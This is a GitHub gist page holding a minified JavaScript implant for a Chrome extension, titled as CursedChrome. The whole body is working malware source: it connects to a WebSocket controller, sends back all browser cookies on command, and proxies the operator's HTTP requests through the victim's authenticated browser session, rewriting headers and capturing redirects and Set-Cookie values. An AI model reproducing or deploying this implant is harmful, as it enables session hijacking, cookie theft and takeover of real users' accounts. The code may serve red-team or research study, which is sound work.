Created
October 7, 2023 13:03
-
-
Save LivingInSyn/9150c00bf07912c1b165494d5ec36370 to your computer and use it in GitHub Desktop.
Minified CursedChrome implant
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var websocket=!1,last_live_connection_timestamp=get_unix_timestamp(),placeholder_secret_token=get_secure_random_token(64),redirect_table={};const REQUEST_HEADER_BLACKLIST=["cookie"],RPC_CALL_TABLE={HTTP_REQUEST:perform_http_request,PONG(){},AUTH:authenticate,GET_COOKIES:get_cookies};async function get_cookies(e){return chrome.cookies?getallcookies({}):[]}function getallcookies(e){return new Promise(function(t,r){try{chrome.cookies.getAll(e,function(e){t(e)})}catch(a){r(a)}})}async function authenticate(e){var t=localStorage.getItem("browser_id");return null===t&&(t=uuidv4(),localStorage.setItem("browser_id",t)),{browser_id:t,user_agent:navigator.userAgent,timestamp:get_unix_timestamp()}}function get_secure_random_token(e){let t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",r=new Uint8Array(e);window.crypto.getRandomValues(r),r=r.map(e=>t.charCodeAt(e%t.length));let a=String.fromCharCode.apply(null,r);return a}function uuidv4(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,e=>(e^crypto.getRandomValues(new Uint8Array(1))[0]&15>>e/4).toString(16))}function arrayBufferToBase64(e){for(var t="",r=new Uint8Array(e),a=r.byteLength,o=0;o<a;o++)t+=String.fromCharCode(r[o]);return window.btoa(t)}function get_unix_timestamp(){return Math.floor(Date.now()/1e3)}const websocket_check_interval=setInterval(()=>{let e=[0,2];if(e.includes(websocket.readyState)){console.log("WebSocket not in appropriate state for liveness check...");return}let t=get_unix_timestamp(),r=t-last_live_connection_timestamp;if(r>29||3===websocket.readyState){console.error("WebSocket does not appear to be live! Restarting the WebSocket connection...");try{websocket.close()}catch(a){}initialize();return}websocket.send(JSON.stringify({id:uuidv4(),version:"1.0.0",action:"PING",data:{}}))},3e3),HEADERS_TO_REPLACE=["origin","referer","access-control-request-headers","access-control-request-method","access-control-allow-origin","date","dnt","trailer","upgrade"];async function perform_http_request(e){let t=e.authenticated?"include":"omit";e.headers["X-PLACEHOLDER-SECRET"]=placeholder_secret_token;var r=[];let a=Object.keys(e.headers);a.map(e=>{HEADERS_TO_REPLACE.includes(e.toLowerCase())&&r.push(e)}),r.map(t=>{let r=`X-PLACEHOLDER-${t}`;e.headers[r]=e.headers[t],delete e.headers[t]});var o={method:e.method,mode:"cors",cache:"no-cache",credentials:t,headers:e.headers,redirect:"follow"};if(e.body){let s=`data:application/octet-stream;base64,${e.body}`,n=await fetch(s);o.body=await n.blob()}try{var i=await fetch(e.url,o)}catch(c){console.error("Error occurred while performing fetch:"),console.error(c);return}var u={};for(var l of i.headers.entries())"x-set-cookie"===l[0]?u["Set-Cookie"]=JSON.parse(l[1]):u[l[0]]=l[1];let d=`${location.origin.toString()}/redirect-hack.html?id=`;if(i.url.startsWith(d)){var m=decodeURIComponent(i.url);m=m.replace(d,"");let p=m,h=redirect_table[p];delete redirect_table[p];var E={};h.headers.map(e=>{"set-cookie"!==e.name.toLowerCase()&&("X-Set-Cookie"===e.name?E["Set-Cookie"]=JSON.parse(e.value):E[e.name]=e.value)});let f={url:i.url,status:h.status_code,status_text:"Redirect",headers:E,body:""};return f}return{url:i.url,status:i.status,status_text:i.statusText,headers:u,body:arrayBufferToBase64(await i.arrayBuffer())}}function initialize(){(websocket=new WebSocket("ws://127.0.0.1:4343")).onopen=function(e){},websocket.onmessage=async function(e){last_live_connection_timestamp=get_unix_timestamp();try{var t=JSON.parse(e.data)}catch(r){console.error("Could not parse WebSocket message!"),console.error(r);return}if(t.action in RPC_CALL_TABLE){let a=await RPC_CALL_TABLE[t.action](t.data);websocket.send(JSON.stringify({id:t.id,origin_action:t.action,result:a}))}else console.error(`No RPC action ${t.action}!`)},websocket.onclose=function(e){e.wasClean?console.log(`[close] Connection closed cleanly, code=${e.code} reason=${e.reason}`):console.log("[close] Connection died")},websocket.onerror=function(e){console.log(`[error] ${e.message}`)}}initialize(),chrome.webRequest.onBeforeSendHeaders.addListener(function(e){if(e.initiator===location.origin.toString()){var t=!1,r=[],a=[];return(e.requestHeaders.map(e=>{"X-PLACEHOLDER-SECRET"===e.name&&e.value===placeholder_secret_token&&(t=!0,r.push("X-PLACEHOLDER-SECRET"))}),t)?(e.requestHeaders.map(e=>{!e.name.startsWith("X-PLACEHOLDER-SECRET")&&e.name.startsWith("X-PLACEHOLDER-")&&(r.push(e.name),!REQUEST_HEADER_BLACKLIST.includes(e.name.replace("X-PLACEHOLDER-","").toLowerCase())&&a.push({name:e.name.replace("X-PLACEHOLDER-",""),value:e.value}))}),e.requestHeaders=e.requestHeaders.filter(e=>!r.includes(e.name)),e.requestHeaders=e.requestHeaders.concat(a),{requestHeaders:e.requestHeaders}):{cancel:!1}}},{urls:["<all_urls>"]},["blocking","requestHeaders","extraHeaders"]);const REDIRECT_STATUS_CODES=[301,302,307];chrome.webRequest.onHeadersReceived.addListener(function(e){if(e.initiator!==location.origin.toString())return;var t=[];if(e.responseHeaders.map(e=>{"set-cookie"===e.name.toLowerCase()&&t.push(e.value)}),0!=t.length&&e.responseHeaders.push({name:"X-Set-Cookie",value:JSON.stringify(t)}),!REDIRECT_STATUS_CODES.includes(e.statusCode))return{responseHeaders:e.responseHeaders};let r=uuidv4();return redirect_table[r]=JSON.parse(JSON.stringify({url:e.url,status_code:e.statusCode,headers:e.responseHeaders})),{redirectUrl:`${location.origin.toString()}/redirect-hack.html?id=`+r}},{urls:["<all_urls>"]},["blocking","responseHeaders","extraHeaders"]); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment